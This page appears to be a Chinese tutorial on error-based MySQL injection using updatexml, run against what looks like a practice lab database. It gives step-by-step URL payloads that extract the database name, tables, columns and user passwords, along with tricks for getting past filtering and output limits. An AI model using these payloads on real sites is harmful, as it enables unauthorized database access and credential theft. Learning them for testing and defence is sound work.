SQL報錯注入之updatexml的實現(xiàn)
1.updatexml報錯原理
updatexml(xml_doument,XPath_string,new_value)
第一個參數(shù):XML的內(nèi)容
第二個參數(shù):是需要update的位置XPATH路徑
第三個參數(shù):是更新后的內(nèi)容
所以第一和第三個參數(shù)可以隨便寫,只需要利用第二個參數(shù),他會校驗你輸入的內(nèi)容是否符合XPATH格式,當我們輸入一個不符合xpath語法的語句就報錯了,我們注入利用的就是這一點。
2.判斷是否有注入點
我們在地址欄中輸入?id=1'
我們在地址欄中輸入?id=1'--+
根據(jù)結(jié)果可以判斷出存在數(shù)字型注入,并且頁面會打印出報錯信息,所以我們可以利用報錯注入來解決
3.updatexml報錯注入
3.1爆庫名
?id=1 and updatexml(1,concat(0x7e,database(),0x7e),0)
0x7e表示~符號,所以數(shù)據(jù)庫名為security
3.2爆表名
mysql 中的 information_schema 這個庫 就像時MYSQL的信息數(shù)據(jù)庫,他保存著mysql 服務器所維護的所有其他的數(shù)據(jù)庫信息, 包括了 庫名,表名,列名。
在注入時,information_schema庫的作用就是獲取 table_schema table_name, column_name .
這些數(shù)據(jù)庫內(nèi)的信息。如果information_schema庫被過濾掉,還可以嘗試使用下述庫來代替
sys.schema_auto_increment_columns
sys.schema_table_statistics_with_buffer
mysql.innodb_table_stats
mysql.innodb_table_index
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)
根據(jù)結(jié)果可知當前security庫下有四張表,并且users表最有可能存放用戶信息
3.3爆字段名
我們通過sql語句查詢知道當前數(shù)據(jù)庫有四個表,根據(jù)表名知道可能用戶的賬戶和密碼是在users表中。接下來我們就是得到該表下的字段名以及內(nèi)容。
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)
根據(jù)結(jié)果可以判斷出字段名不全,這是因為updataxml函數(shù)只顯示32位,所以我們可以用substr函數(shù)來慢慢截取來獲得所有的字段名
?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_name='users'),0x7e),1)
這樣我們最終會得到所有的字段名
如果我們給select語句多加一個where條件會變成什么樣呢?
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)
此次查詢直接就爆出users表的列名,可以得到兩個敏感字段就是username和password,最有可能存放用戶的賬號密碼
3.4爆數(shù)據(jù)
?id=1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1)
通過limit函數(shù)可以爆出各個用戶的密碼
當然也可以通過剛剛所述的substr函數(shù)來截取密碼
?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,password),1,20) from users),0x7e),1)
此次updatexml報錯注入就結(jié)束啦!
到此這篇關(guān)于SQL報錯注入之updatexml的實現(xiàn)的文章就介紹到這了,更多相關(guān)SQL updatexml內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
SQL?server常見的數(shù)據(jù)類型轉(zhuǎn)換整理大全
這篇文章主要給大家介紹了關(guān)于SQL?server常見的數(shù)據(jù)類型轉(zhuǎn)換整理的相關(guān)資料,在 SQL Server中可以使用CAST或CONVERT函數(shù)來進行數(shù)據(jù)類型轉(zhuǎn)換,需要的朋友可以參考下2023-11-11使用SQL語句創(chuàng)建數(shù)據(jù)庫與創(chuàng)建表操作指南
這篇文章主要給大家介紹了關(guān)于使用SQL語句創(chuàng)建數(shù)據(jù)庫與創(chuàng)建表操作的相關(guān)資料,創(chuàng)建數(shù)據(jù)庫是數(shù)據(jù)庫管理的第一步,而SQL語句是創(chuàng)建數(shù)據(jù)庫的基本工具,需要的朋友可以參考下2023-08-08SQLSERVER 本地查詢更新操作遠程數(shù)據(jù)庫的代碼
SQLSERVER 本地查詢更新操作遠程數(shù)據(jù)庫的代碼,需要的朋友可以參考下2012-11-11